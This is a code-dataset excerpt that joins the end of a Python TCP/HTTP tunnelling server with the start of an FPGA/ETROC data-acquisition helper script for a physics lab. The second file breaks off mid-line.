key{},{}\".format(self.pkg.SECRET_KEY_CRC32,self.pkg.SECRET_KEY_REVERSED_CRC32))\n\n buff = select_recv(conn_slaver, CtrlPkg.PACKAGE_SIZE, 2)\n if buff is None:\n return False\n\n pkg, verify = self.pkg.decode_verify(buff, CtrlPkg.PTYPE_HS_S2M) # type: CtrlPkg,bool\n\n log.debug(\"CtrlPkg from slaver {}: {}\".format(conn_slaver.getpeername(), pkg))\n\n return verify\n\n def _get_an_active_slaver(self):\n \"\"\"get and activate an slaver for data transfer\"\"\"\n try_count = 10\n while not self._stopped['stop']:\n try:\n logging.info(\"master _get_an_active_slaver self.slaver_pool:{},{}\".format(id(self.slaver_pool), self.slaver_pool))\n dict_slaver = self.slaver_pool.popleft()\n except:\n if try_count:\n time.sleep(0.02)\n try_count -= 1\n if try_count % 10 == 0:\n log.error(\"!!NO SLAVER AVAILABLE!! trying {}\".format(try_count))\n continue\n return None\n\n conn_slaver = dict_slaver[\"conn_slaver\"]\n\n try:\n hs = self._handshake(conn_slaver)\n except Exception as e:\n log.warning(\"Handshake failed: {},key:{},{},{},{}\".format(e,id(self),self.pkg.skey,self.pkg.SECRET_KEY_CRC32,self.pkg.SECRET_KEY_REVERSED_CRC32))\n log.debug(traceback.format_exc())\n hs = False\n\n if hs:\n return conn_slaver\n else:\n log.warning(\"slaver handshake failed: {}\".format(dict_slaver[\"addr_slaver\"]))\n try_close(conn_slaver)\n\n time.sleep(0.02)\n\n def _assign_slaver_daemon(self):\n while not self._stopped['stop']:\n conn_customer, addr_customer,tmp = self.pending_customers.get()\n\n self.working_pool[addr_customer] = {\n \"addr_customer\": addr_customer,\n \"conn_customer\": conn_customer\n }\n\n try:\n self._serve_customer(conn_customer)\n except:\n try:\n try_close(conn_customer)\n except:\n pass\n continue\n\n def _listen_customer(self):\n # if self.ssl:\n # context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n # context.load_cert_chain(certfile=https_service.pemfile, keyfile=https_service.keyfile)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.try_bind_port(sock, self.customer_listen_addr)\n sock.listen(20)\n self._listening_sockets.append(sock)\n log.info(\"Listening for customers: {}\".format(\n fmt_addr(self.customer_listen_addr)))\n while not self._stopped['stop']:\n conn_customer, addr_customer = sock.accept()\n # if self.ssl:\n # conn_customer = context.wrap_socket(conn_customer, server_side=True)\n log.info(\"Serving customer: {} Total customers: {}\".format(\n addr_customer, self.pending_customers.qsize() + 1\n ))\n\n # just put it into the queue,\n # let _assign_slaver_daemon() do the else\n # don't block this loop\n self.pending_customers.put((conn_customer, addr_customer,None))\n\n\nclass HttpBridge:\n def __init__(self,agre=\"http\"):\n self.conn_rd = set() # record readable-sockets\n self.fdmap={}\n self.map = {} # record sockets pairs\n self.callbacks = {} # record callbacks\n self.tmp_thread = None\n self.agre = agre\n\n self.hostdict = {}\n\n def updateconfig(self,host):\n if host is not None:\n self.hostdict = host\n\n def add_conn_pair(self, conn1, callback=None):\n self.conn_rd.add(conn1)\n\n logging.info(\"HttpBridge add_conn_pair con:{}\".format(conn1))\n\n # record callback\n if callback is not None:\n self.callbacks[conn1] = callback\n\n def get_thread(self):\n return self.tmp_thread\n\n def start_as_daemon(self):\n t = threading.Thread(target=self.start)\n t.daemon = True\n t.start()\n log.info(\"SocketBridge daemon started\")\n self.tmp_thread = t;\n # return t\n\n def start(self):\n server_pool.ServerPool.bridgeAdd += 1\n while True:\n try:\n self._start()\n except:\n log.error(\"FATAL ERROR! SocketBridge failed {}\".format(\n traceback.format_exc()\n ))\n\n def _start(self):\n # memoryview act as an recv buffer\n # refer https://docs.python.org/3/library/stdtypes.html#memoryview\n # buff = memoryview(bytearray(RECV_BUFFER_SIZE))\n while True:\n if not self.conn_rd:\n # sleep if there is no connections\n time.sleep(0.06)\n continue\n\n # blocks until there is socket(s) ready for .recv\n # notice: sockets which were closed by remote,\n # are also regarded as read-ready by select()\n r, w, e = select.select(self.conn_rd, [], [], 0.5)\n\n for s in r: # iter every read-ready or closed sockets\n try:\n # here, we use .recv_into() instead of .recv()\n # recv data directly into the pre-allocated buffer\n # to avoid many unnecessary malloc()\n # see https://docs.python.org/3/library/socket.html#socket.socket.recv_into\n buff = bytearray(RECV_BUFFER_SIZE)\n rec_len = s.recv_into(buff, RECV_BUFFER_SIZE)\n\n agre = self.agre\n buffdata = buff[:rec_len]\n infoss = buffdata.decode('utf-8')\n heads = httphead(infoss)\n logging.info(\"recv head:{}\".format(heads))\n url = agre + '://' + heads['Host']\n logging.info(\"hostdict PAN DUAN:{},len:{}\".format(url,len(self.conn_rd)))\n\n cfg = self.hostdict.get(url)\n logging.info(\"hostdict config url:{},cfg:{}\".format(url, cfg))\n auth = None\n if cfg:\n if cfg.get('username'):\n if heads.get('Authorization'):\n _,pwd = heads['Authorization'].split('Basic ')\n pwd = base64.b64decode(pwd)\n auth = cfg['username']+\":\"+cfg['password']\n logging.info(\"http password compare:{} - {}\".format(pwd.decode(\"utf-8\"),auth))\n if pwd.decode(\"utf-8\") == auth:\n auth = True\n else:\n auth = None\n else:\n auth = True\n else:\n self._rd_shutdown(s,False,0)\n continue\n if auth is True:\n portcfg = self.hostdict[url]\n loop = server_pool.ServerPool.get_instance().getloop\n dict = loop.getPortdict\n logging.info(\"http resend by url:{}\".format(url))\n # m1 = id(buff)\n # b2 = buff[:rec_len]\n # m2 = id(b2)\n # logging.info(\"地址比较:{},{}\".format(m1,m2))\n dict[str(portcfg['port'])].master.add_http_customer(s,s.getpeername(),buffdata)\n self.conn_rd.remove(s)\n # tosock = self.map[s]\n # self.conn_rd.remove(tosock)\n # self.map.pop(s)\n # self.map.pop(tosock)\n continue\n else:\n html = 'Tunnel %s not found' % heads['Host']\n header = \"HTTP/1.0 401 Unauthorised\" + \"\\r\\n\"\n header += \"Server: SokEvo/1.0\" + \"\\r\\n\"\n header += 'WWW-Authenticate: Basic realm=\"'+ heads['Host'] +'\"' + \"\\r\\n\"\n header += \"Content-Type: text/html\" + \"\\r\\n\"\n header += \"Content-Length: %d\" + \"\\r\\n\"\n header += \"\\r\\n\" + \"%s\"\n buf = header % (len(html.encode('utf-8')), html)\n s.send(buf.encode('utf-8'))\n logging.info(\"http resend fail url:{}\".format(url))\n # self._rd_shutdown(s,False,1)\n\n except Exception as e:\n # unable to read, in most cases, it's due to socket close\n self._rd_shutdown(s,False,2,e)\n continue\n\n if not rec_len:\n # read zero size, closed or shutdowned socket\n self._rd_shutdown(s,False,3)\n continue\n\n # try:\n # # send data, we use `buff[:rec_len]` slice because\n # # only the front of buff is filled\n # self.map[s].send(buff[:rec_len])\n # except Exception as e:\n # unable to send, close connection\n self._rd_shutdown(s,False,4)\n # continue\n\n def _rd_shutdown(self, conn, once=False,ff=False,e=False):\n \"\"\"action when connection should be read-shutdown\n :type conn: socket.SocketType\n \"\"\"\n\n logging.info(\"HttpBridge _rd_shutdown con:{} from:{} e:{}\".format(conn,ff,e))\n\n if conn in self.conn_rd:\n self.conn_rd.remove(conn)\n\n try:\n conn.shutdown(socket.SHUT_RD)\n except:\n pass\n\n if not once and conn in self.map: # use the `once` param to avoid infinite loop\n # if a socket is rd_shutdowned, then it's\n # pair should be wr_shutdown.\n self._wr_shutdown(self.map[conn], True)\n\n if self.map.get(conn) not in self.conn_rd:\n # if both two connection pair was rd-shutdowned,\n # this pair sockets are regarded to be completed\n # so we gonna close them\n self._terminate(conn)\n\n def _wr_shutdown(self, conn, once=False):\n \"\"\"action when connection should be write-shutdown\n :type conn: socket.SocketType\n \"\"\"\n try:\n conn.shutdown(socket.SHUT_WR)\n except:\n pass\n\n if not once and conn in self.map: # use the `once` param to avoid infinite loop\n # pair should be rd_shutdown.\n # if a socket is wr_shutdowned, then it's\n self._rd_shutdown(self.map[conn], True)\n\n def _terminate(self, conn):\n \"\"\"terminate a sockets pair (two socket)\n :type conn: socket.SocketType\n :param conn: any one of the sockets pair\n \"\"\"\n try_close(conn) # close the first socket\n\n server_pool.ServerPool.bridgeRemove += 1\n\n # ------ close and clean the mapped socket, if exist ------\n if conn in self.map:\n _mapped_conn = self.map[conn]\n try_close(_mapped_conn)\n if _mapped_conn in self.map:\n del self.map[_mapped_conn]\n\n del self.map[conn] # clean the first socket\n else:\n _mapped_conn = None # just a fallback\n\n # ------ callback --------\n # because we are not sure which socket are assigned to callback,\n # so we should try both\n if conn in self.callbacks:\n try:\n self.callbacks[conn]()\n except Exception as e:\n log.error(\"traceback error: {}\".format(e))\n log.debug(traceback.format_exc())\n del self.callbacks[conn]\n elif _mapped_conn and _mapped_conn in self.callbacks:\n try:\n self.callbacks[_mapped_conn]()\n except Exception as e:\n log.error(\"traceback error: {}\".format(e))\n log.debug(traceback.format_exc())\n del self.callbacks[_mapped_conn]\n","repo_name":"mxdg/passbytcp","sub_path":"server/master2.py","file_name":"master2.py","file_ext":"py","file_size_in_byte":22893,"program_lang":"python","lang":"en","doc_type":"code","stars":252,"dataset":"github-code","pt":"65"} +{"seq_id":"14864309523","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport time\r\n#import visa\r\nimport threading\r\nimport numpy as np\r\nimport matplotlib\r\nimport os\r\n# matplotlib.use('WebAgg')\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\r\nfrom queue import Queue\r\nfrom collections import deque\r\nimport queue\r\nfrom command_interpret import *\r\nfrom ETROC1_ArrayReg import *\r\nfrom translate_data import *\r\nimport datetime\r\n#========================================================================================#\r\n'''\r\n@author: Wei Zhang, Murtaza Safdari\r\n@date: 2023-03-24\r\nThis script is composed of all the helper functions needed for I2C comms, FPGA, etc\r\n'''\r\n#--------------------------------------------------------------------------#\r\ndef start_periodic_L1A_WS(cmd_interpret):\r\n ## 4-digit 16 bit hex, Duration is LSB 12 bits\r\n ## This tells us how many memory slots to use\r\n register_11(cmd_interpret, 0x0deb)\r\n time.sleep(0.01)\r\n\r\n ## 4-digit 16 bit hex, 0xWXYZ\r\n ## WX (8 bit) - Error Mask\r\n ## Y - trigSize[1:0],Period,testTrig\r\n ## Z - Input command\r\n register_12(cmd_interpret, 0x0030) # This is periodic Idle FC\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0032) # This is periodic BC Reset FC\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0000)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0035) # This is periodic Qinj FC\r\n cmd_interpret.write_config_reg(10, 0x0001)\r\n cmd_interpret.write_config_reg(9, 0x0001)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0036) # This is periodic L1A FC\r\n cmd_interpret.write_config_reg(10, 0x01f0)\r\n cmd_interpret.write_config_reg(9, 0x01ff)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret) # This initializes the memory and starts the FC cycles\r\n time.sleep(0.01)\r\n \r\ndef start_onetime_L1A_WS(cmd_interpret):\r\n ## 4-digit 16 bit hex, Duration is LSB 12 bits\r\n ## This tells us how many memory slots to use\r\n register_11(cmd_interpret, 0x0deb)\r\n time.sleep(0.01)\r\n\r\n ## 4-digit 16 bit hex, 0xWXYZ\r\n ## WX (8 bit) - Error Mask\r\n ## Y - trigSize[1:0],Period,testTrig\r\n ## Z - Input command\r\n register_12(cmd_interpret, 0x0000) # This is onetime Idle FC\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0002) # This is onetime BC Reset FC\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0000)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0005) # This is onetime Qinj FC\r\n cmd_interpret.write_config_reg(10, 0x0001)\r\n cmd_interpret.write_config_reg(9, 0x0001)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0006) # This is onetime L1A FC\r\n cmd_interpret.write_config_reg(10, 0x01f0)\r\n cmd_interpret.write_config_reg(9, 0x01ff)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret) # This initializes the memory and starts the FC cycles\r\n time.sleep(0.01)\r\n\r\ndef start_L1A(cmd_interpret):\r\n ## dec = 3564\r\n register_11(cmd_interpret, 0x0deb)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0030)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0032)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0000)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0035)\r\n cmd_interpret.write_config_reg(10, 0x0001)\r\n cmd_interpret.write_config_reg(9, 0x0001)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0036)\r\n cmd_interpret.write_config_reg(10, 0x01f9)\r\n cmd_interpret.write_config_reg(9, 0x01f9)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef start_L1A_1MHz(cmd_interpret):\r\n register_11(cmd_interpret, 0x0de7)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0030)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0de7)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n \r\n register_12(cmd_interpret, 0x0032)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0000)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n for index in range(89):\r\n register_12(cmd_interpret, 0x0035)\r\n cmd_interpret.write_config_reg(10, 0x0001 + index*40)\r\n cmd_interpret.write_config_reg(9, 0x0001 + index*40)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0036)\r\n cmd_interpret.write_config_reg(10, 0x019 + index*40)\r\n cmd_interpret.write_config_reg(9, 0x019 + index*40)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef start_L1A_trigger_bit(cmd_interpret):\r\n register_11(cmd_interpret, 0x0deb)\r\n\r\n time.sleep(0.01)\r\n\r\n # IDLE\r\n register_12(cmd_interpret, 0x0070)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n \r\n # BCR\r\n # register_12(cmd_interpret, 0x0072)\r\n # cmd_interpret.write_config_reg(10, 0x0000)\r\n # cmd_interpret.write_config_reg(9, 0x0000)\r\n # fc_init_pulse(cmd_interpret)\r\n # time.sleep(0.01)\r\n\r\n # QInj FC\r\n register_12(cmd_interpret, 0x0075)\r\n cmd_interpret.write_config_reg(10, 0x0005)\r\n cmd_interpret.write_config_reg(9, 0x0005)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n ### Send L1A\r\n register_12(cmd_interpret, 0x0076)\r\n cmd_interpret.write_config_reg(10, 0x01fd)\r\n cmd_interpret.write_config_reg(9, 0x01fd)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n\r\n time.sleep(0.01)\r\n\r\ndef start_L1A_trigger_bit_data(cmd_interpret):\r\n register_11(cmd_interpret, 0x0deb)\r\n\r\n time.sleep(0.01)\r\n\r\n # Idle\r\n register_12(cmd_interpret, 0x0070)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n \r\n # BCR\r\n register_12(cmd_interpret, 0x0072)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0000)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n \r\n fc_signal_start(cmd_interpret)\r\n\r\n time.sleep(0.01)\r\n \r\n\r\ndef start_L1A_train(cmd_interpret):\r\n\r\n ## Register 11, needs do_fc option\r\n ## 4-digit 16 bit hex, Duration\r\n register_11_key = 0x0021\r\n\r\n ## Register 12, needs do_fc option\r\n ## 4-digit 16 bit hex, 0xWXYZ\r\n ## WX (8 bit) - Error Mask\r\n ## Y - trigSize[1:0],Period,testTrig\r\n ## Z - Input command\r\n register_12_key = 0x0036\r\n register_11(cmd_interpret, key = register_11_key)\r\n register_12(cmd_interpret, key = register_12_key)\r\n fc_signal_start(cmd_interpret)\r\n software_clear_fifo(cmd_interpret) \r\n time.sleep(0.5)\r\n\r\n register_11_key = 0x0020\r\n register_12_key = 0x0035\r\n register_11(cmd_interpret, key = register_11_key)\r\n register_12(cmd_interpret, key = register_12_key)\r\n fc_signal_start(cmd_interpret)\r\n software_clear_fifo(cmd_interpret) \r\n\r\ndef stop_L1A(cmd_interpret):\r\n register_12(cmd_interpret, 0x0030)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n software_clear_fifo(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef stop_L1A_trigger_bit(cmd_interpret):\r\n register_12(cmd_interpret, 0x0070)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n # software_clear_fifo(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef stop_L1A_1MHz(cmd_interpret):\r\n register_12(cmd_interpret, 0x0030)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0de7)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n software_clear_fifo(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef stop_L1A_1MHz_trigger_bit(cmd_interpret):\r\n register_12(cmd_interpret, 0x0070)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0de7)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n software_clear_fifo(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef stop_L1A_train(cmd_interpret):\r\n software_clear_fifo(cmd_interpret)\r\n\r\n register_11_key = 0x0021\r\n register_12_key = 0x0006\r\n register_11(cmd_interpret, key = register_11_key)\r\n register_12(cmd_interpret, key = register_12_key)\r\n fc_signal_start(cmd_interpret)\r\n software_clear_fifo(cmd_interpret) \r\n\r\n register_11_key = 0x0020\r\n register_12_key = 0x0005\r\n register_11(cmd_interpret, key = register_11_key)\r\n register_12(cmd_interpret, key = register_12_key)\r\n fc_signal_start(cmd_interpret)\r\n software_clear_fifo(cmd_interpret) \r\n\r\ndef link_reset(cmd_interpret):\r\n software_clear_fifo(cmd_interpret) \r\n\r\n# define a threading class for saving data from FPGA Registers only\r\nclass Save_FPGA_data(threading.Thread):\r\n def __init__(self, name, cmd_interpret, time_limit, overwrite, output_directory, isQInj, DAC_Val):\r\n threading.Thread.__init__(self, name=name)\r\n self.cmd_interpret = cmd_interpret\r\n self.time_limit = time_limit\r\n self.overwrite = overwrite\r\n self.output_directory = output_directory\r\n self.isQInj = isQInj\r\n self.DAC_Val = DAC_Val\r\n\r\n def run(self):\r\n if(self.isQInj):\r\n start_L1A_trigger_bit(self.cmd_interpret) # sending IDLE + QINJ FC + L1A FC\r\n else:\r\n stop_L1A_trigger_bit(self.cmd_interpret) # only sending IDLE FC \r\n t = threading.current_thread() # Local reference of THIS thread object\r\n t.alive = True # Thread is alive by default\r\n print(\"{} is saving FPGA data directly...\".format(self.getName()))\r\n total_start_time = time.time()\r\n userdefinedir = self.output_directory\r\n today = datetime.date.today()\r\n todaystr = \"../ETROC-Data/\" + today.isoformat() + \"_Array_Test_Results\"\r\n try:\r\n os.mkdir(todaystr)\r\n print(\"Directory %s was created!\"%todaystr)\r\n except FileExistsError:\r\n print(\"Directory %s already exists!\"%todaystr)\r\n userdefine_dir = todaystr + \"/%s\"%userdefinedir\r\n outfile = None\r\n try:\r\n os.mkdir(userdefine_dir)\r\n except FileExistsError:\r\n print(\"User defined directory %s already created!\"%(userdefine_dir))\r\n if(self.overwrite != True):\r\n outfile = open(\"./%s/FPGA_Data.dat\"%(userdefine_dir), 'a')\r\n else:\r\n if os.path.exists(\"./%s/FPGA_Data.dat\"%(userdefine_dir)):\r\n os.system(\"rm ./%s/FPGA_Data.dat\"%(userdefine_dir))\r\n outfile = open(\"./%s/FPGA_Data.dat\"%(userdefine_dir), 'w')\r\n if outfile is None:\r\n print(\"Outfile not set!\")\r\n sys.exit(1)\r\n sleep_time = self.time_limit\r\n if sleep_time < 3:\r\n sleep_time = 3\r\n if not t.alive:\r\n print(\"Check Link Thread detected alive=False\")\r\n time.sleep(sleep_time)\r\n read_register = self.cmd_interpret.read_config_reg(7)\r\n fpga_duration = int(format(read_register, '016b')[-6:], base=2)\r\n read_register = self.cmd_interpret.read_config_reg(8)\r\n en_L1A = format(read_register, '016b')[-11]\r\n fpga_data = int(format(self.cmd_interpret.read_status_reg(4), '016b')+format(self.cmd_interpret.read_status_reg(3), '016b'), base=2)\r\n fpga_header = int(format(self.cmd_interpret.read_status_reg(6), '016b')+format(self.cmd_interpret.read_status_reg(5), '016b'), base=2)\r\n fpga_state = int(format(self.cmd_interpret.read_status_reg(7), '016b'), base=2)\r\n fpga_triggerbit = int(format(self.cmd_interpret.read_status_reg(9), '016b')+format(self.cmd_interpret.read_status_reg(8), '016b'), base=2)\r\n outfile.write(f'{fpga_state},{en_L1A},{fpga_duration},{fpga_data},{fpga_header},{fpga_triggerbit},{self.DAC_Val}\\n')\r\n outfile.close()\r\n stop_L1A_trigger_bit(self.cmd_interpret)\r\n print(\"%s finished!\"%self.getName())\r\n#--------------------------------------------------------------------------#\r\n\r\n# define a receive data threading class\r\nclass Receive_data(threading.Thread):\r\n def __init__(self, name, queue, cmd_interpret, num_fifo_read, read_thread_handle, write_thread_handle, time_limit, use_IPC = False, stop_DAQ_event = None, IPC_queue = None):\r\n threading.Thread.__init__(self, name=name)\r\n self.queue = queue\r\n self.cmd_interpret = cmd_interpret\r\n self.num_fifo_read = num_fifo_read\r\n self.read_thread_handle = read_thread_handle\r\n self.write_thread_handle = write_thread_handle\r\n self.time_limit = time_limit\r\n self.use_IPC = use_IPC\r\n self.stop_DAQ_event = stop_DAQ_event\r\n self.IPC_queue = IPC_queue\r\n if self.use_IPC and self.IPC_queue is None:\r\n self.use_IPC = False\r\n if not self.use_IPC:\r\n self.daq_on = True\r\n if self.stop_DAQ_event is not None:\r\n self.stop_DAQ_event.set()\r\n else:\r\n self.daq_on = True\r\n self.stop_DAQ_event.clear()\r\n \r\n def run(self):\r\n t = threading.current_thread() # Local reference of THIS thread object\r\n t.alive = True # Thread is alive by default\r\n mem_data = []\r\n total_start_time = time.time()\r\n print(\"{} is reading data and pushing to the queue...\".format(self.getName()))\r\n while ((time.time()-total_start_time<=self.time_limit)):\r\n if self.use_IPC:\r\n try:\r\n message = self.IPC_queue.get(False)\r\n print(f'Message: {message}')\r\n if message == 'start DAQ':\r\n self.daq_on = True\r\n elif message == 'stop DAQ':\r\n self.daq_on = False\r\n elif message == 'start L1A':\r\n start_L1A(self.cmd_interpret)\r\n elif message == 'start L1A 1MHz':\r\n start_L1A_1MHz(self.cmd_interpret)\r\n elif message == 'start L1A trigger bit':\r\n start_L1A_trigger_bit(self.cmd_interpret)\r\n # elif message == 'start L1A 1MHz trigger bit':\r\n # start_L1A_1MHz_trigger_bit(self.cmd_interpret)\r\n elif message == 'start L1A trigger bit data':\r\n start_L1A_trigger_bit_data(self.cmd_interpret)\r\n elif message == 'stop L1A':\r\n stop_L1A(self.cmd_interpret)\r\n elif message == 'stop L1A 1MHz':\r\n stop_L1A_1MHz(self.cmd_interpret)\r\n elif message == 'stop L1A trigger bit':\r\n stop_L1A_trigger_bit(self.cmd_interpret)\r\n elif message == 'stop L1A 1MHz trigger bit':\r\n stop_L1A_1MHz_trigger_bit(self.cmd_interpret)\r\n elif message == 'stop L1A train':\r\n stop_L1A_train(self.cmd_interpret)\r\n elif message == 'start L1A train':\r\n start_L1A_train(self.cmd_interpret)\r\n elif message == 'allow threads to exit':\r\n self.stop_DAQ_event.set()\r\n elif message == 'link reset':\r\n link_reset(self.cmd_interpret)\r\n ## Special if condition for delay change during the DAQ\r\n ## Example: change delay 0x0421\r\n ## becomes: change delay 1057\r\n elif ' '.join(message.split(' ')[:2]) == 'change delay':\r\n triggerBitDelay(self.cmd_interpret, int(message.split(' ')[2], base=16))\r\n else:\r\n print(f'Unknown message: {message}')\r\n except queue.Empty:\r\n pass\r\n\r\n if self.daq_on:\r\n # max allowed by read_memory is 65535\r\n mem_data = self.cmd_interpret.read_data_fifo(self.num_fifo_read)\r\n for mem_line in mem_data:\r\n self.queue.put(mem_line) \r\n if not t.alive:\r\n print(\"Read Thread detected alive=False\")\r\n # self.is_alive = False\r\n break \r\n if self.read_thread_handle.is_set():\r\n print(\"Read Thread received STOP signal\")\r\n if not self.write_thread_handle.is_set():\r\n print(\"Sending stop signal to Write Thread\")\r\n self.write_thread_handle.set()\r\n print(\"Stopping Read Thread\")\r\n # self.is_alive = False\r\n break\r\n print(\"Read Thread gracefully sending STOP signal to other threads\") \r\n self.read_thread_handle.set()\r\n # self.is_alive = False\r\n print(\"Sending stop signal to Write Thread\")\r\n self.write_thread_handle.set()\r\n print(\"%s finished!\"%self.getName())\r\n#--------------------------------------------------------------------------#\r\n\r\n# define a write data class\r\nclass Write_data(threading.Thread):\r\n def __init__(self, name, read_queue, translate_queue, num_line, store_dict, binary_only, compressed_binary, skip_binary, make_plots, read_thread_handle, write_thread_handle, translate_thread_handle, stop_DAQ_event = None):\r\n threading.Thread.__init__(self, name=name)\r\n self.read_queue = read_queue\r\n self.translate_queue = translate_queue\r\n self.num_line = num_line\r\n self.store_dict = store_dict\r\n self.binary_only = binary_only\r\n self.compressed_binary = compressed_binary\r\n self.skip_binary = skip_binary\r\n self.make_plots = make_plots\r\n self.read_thread_handle = read_thread_handle\r\n self.write_thread_handle = write_thread_handle\r\n self.translate_thread_handle = translate_thread_handle\r\n self.stop_DAQ_event = stop_DAQ_event\r\n # self.is_alive = False\r\n\r\n # def check_alive(self):\r\n # return self.is_alive\r\n\r\n def run(self):\r\n t = threading.current_thread() # Local reference of THIS thread object\r\n t.alive = True # Thread is alive by default\r\n # self.is_alive = True\r\n file_lines = 0\r\n file_counter = 0\r\n if (not self.skip_binary):\r\n outfile = open(\"./%s/TDC_Data_%d.dat\"%(self.store_dict, file_counter), 'w')\r\n print(\"{} is reading queue and writing file {}...\".format(self.getName(), file_counter))\r\n else:\r\n print(\"{} is reading queue and pushing binary onwards...\".format(self.getName()))\r\n retry_count = 0\r\n while (True):\r\n if not t.alive:\r\n print(\"Write Thread detected alive=False\")\r\n outfile.close()\r\n # self.is_alive = False\r\n break \r\n if(file_lines>self.num_line and (not self.skip_binary)):\r\n outfile.close()\r\n file_lines=0\r\n file_counter = file_counter + 1\r\n outfile = open(\"./%s/TDC_Data_%d.dat\"%(self.store_dict, file_counter), 'w')\r\n print(\"{} is reading queue and writing file {}...\".format(self.getName(), file_counter))\r\n elif(file_lines>self.num_line):\r\n file_lines=0\r\n file_counter = file_counter + 1\r\n mem_data = \"\"\r\n # Attempt to pop off the read_queue for 30 secs, fail if nothing found\r\n try:\r\n mem_data = self.read_queue.get(True, 1)\r\n retry_count = 0\r\n except queue.Empty:\r\n if not self.stop_DAQ_event.is_set():\r\n retry_count = 0\r\n continue\r\n if self.write_thread_handle.is_set():\r\n print(\"Write Thread received STOP signal AND ran out of data to write\")\r\n break\r\n retry_count += 1\r\n if retry_count < 30:\r\n continue\r\n print(\"BREAKING OUT OF WRITE LOOP CAUSE I'VE WAITING HERE FOR 30s SINCE LAST FETCH FROM READ_QUEUE!!!\")\r\n # self.read_thread_handle.set()\r\n # self.is_alive = False\r\n break\r\n # Handle the raw (binary) line\r\n if int(mem_data) == 0: continue # Waiting for IPC\r\n if int(mem_data) == 38912: continue # got a Filler\r\n if int(mem_data) == 9961472: continue # got a Filler\r\n if int(mem_data) == 